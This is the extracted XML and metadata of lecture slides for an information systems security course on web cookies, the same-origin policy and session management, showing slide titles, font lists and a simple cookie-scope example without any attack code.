                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>https://login.site.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="4114800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="MS PGothic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227165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cookie 1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u1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login.site.com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1438" y="1676400"/>
            <a:ext cx="2577950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cookie 2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userid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=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u2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domain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site.com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=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non-secure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429000" y="1143000"/>
            <a:ext cx="29931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both set by  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login.site.com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43400" y="4572000"/>
            <a:ext cx="4022255" cy="145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cookie: userid=u2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pP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cookie: userid=u2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr 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cookie: userid=u1; userid=u2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72200" y="6019800"/>
            <a:ext cx="18389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(arbitrary order)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2872</TotalTime>
  <Words>1974</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>567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ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>Gulim</vt:lpstr>
      <vt:lpstr>Perpetua</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Equity</vt:lpstr>
      <vt:lpstr>CS-446: Information Systems Security</vt:lpstr>
      <vt:lpstr>Overview </vt:lpstr>
      <vt:lpstr>Web Session Management (Cookies)</vt:lpstr>
      <vt:lpstr>Same origin policy:   “high level”</vt:lpstr>
      <vt:lpstr>Setting/deleting cookies by server</vt:lpstr>
      <vt:lpstr>Scope setting rules   (write SOP)</vt:lpstr>
      <vt:lpstr>Cookies are identified by  (name,domain,path)</vt:lpstr>
      <vt:lpstr>Reading cookies on server   (read SOP)</vt:lpstr>
      <vt:lpstr>Examples</vt:lpstr>
      <vt:lpstr>Client side read/write: document.cookie (dom element)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Viewing/deleting cookies in Browser UI</vt:lpstr>
      <vt:lpstr>Cookie Protocol Problems</vt:lpstr>
      <vt:lpstr>Example 1:  login server problems</vt:lpstr>
      <vt:lpstr>Example 2:   “secure” cookies are not secure</vt:lpstr>
      <vt:lpstr>Interaction with the DOM SOP</vt:lpstr>
      <vt:lpstr>Cookies have no Integrity !!!</vt:lpstr>
      <vt:lpstr>Storing security data on browser?</vt:lpstr>
      <vt:lpstr>Historical problems …   (circa 2000)</vt:lpstr>
      <vt:lpstr>Solution: Cryptographic Checksums</vt:lpstr>
      <vt:lpstr>Example: .NET 2.0</vt:lpstr>
      <vt:lpstr>Session Management</vt:lpstr>
      <vt:lpstr>Sessions</vt:lpstr>
      <vt:lpstr>Pre-history:   HTTP auth</vt:lpstr>
      <vt:lpstr>HTTP auth problems</vt:lpstr>
      <vt:lpstr>Session tokens</vt:lpstr>
      <vt:lpstr>Storing session tokens:    Lots of options   (but none are perfect)</vt:lpstr>
      <vt:lpstr>Storing session tokens:   problems</vt:lpstr>
      <vt:lpstr>The HTTP Referrer Header</vt:lpstr>
      <vt:lpstr>The Logout Process</vt:lpstr>
      <vt:lpstr>Sites with Improper Logout</vt:lpstr>
      <vt:lpstr>Session Hijacking</vt:lpstr>
      <vt:lpstr>1. Predictable tokens</vt:lpstr>
      <vt:lpstr>2.   Cookie theft</vt:lpstr>
      <vt:lpstr>Session fixation attacks</vt:lpstr>
      <vt:lpstr>Session fixation:  lesson</vt:lpstr>
      <vt:lpstr>Generating Session Tokens</vt:lpstr>
      <vt:lpstr>Option 1:   minimal client-side state</vt:lpstr>
      <vt:lpstr>Option 2:  lots of client-side state</vt:lpstr>
      <vt:lpstr>Binding SessionToken to client’s computer; mitigating cookie theft</vt:lpstr>
      <vt:lpstr>Cookies Theft: Basic Cross Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Example: reflected XSS</vt:lpstr>
      <vt:lpstr>Bad input</vt:lpstr>
      <vt:lpstr>So what?</vt:lpstr>
      <vt:lpstr>HttpOnly Cookies     IE6 SP1,   FF2.0.0.5</vt:lpstr>
      <vt:lpstr>3rd Party Cookies: User Tracking</vt:lpstr>
      <vt:lpstr>3rd party cookies</vt:lpstr>
      <vt:lpstr>Can we block 3rd party cookies?</vt:lpstr>
      <vt:lpstr>Effectiveness of 3rd party blocking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799</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-31T02:47:05Z</dcterms:modified>
</cp:coreProperties>
</file>